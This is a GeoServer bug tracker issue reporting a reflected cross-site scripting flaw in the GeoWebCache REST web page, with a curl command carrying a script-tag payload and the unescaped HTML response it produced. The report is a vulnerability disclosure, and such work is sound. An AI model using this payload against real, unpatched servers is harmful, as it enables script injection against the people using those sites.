Uploaded image for project: 'GeoServer'
  1. GeoServer
  2. GEOS-7713

Another XSS vulnerability in GWC

    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Medium
    • Resolution: Fixed
    • Affects Version/s: 2.8.5
    • Fix Version/s: 2.12-RC1
    • Component/s: Vulnerability
    • Environment:

      Tomcat 7, OpenJDK 1.8.0_102

      Description

      Running 

      curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'

      yields an answer with unescaped HTML:

      <html><body>
<a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a>
<h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer  by appending the name of the layer to the URL, DELETE an existing layer  or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li>
<li><h4>seed</h4></li>
</ul></body></html>

      Looks like the problem is similar to GEOS-7549 Closed .

        Attachments

          Activity

            People

            • Assignee:
              Unassigned
              Reporter:
              hrubsa Juraj Hrubsa
            • Votes:
              0 Vote for this issue
              Watchers:
              4 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: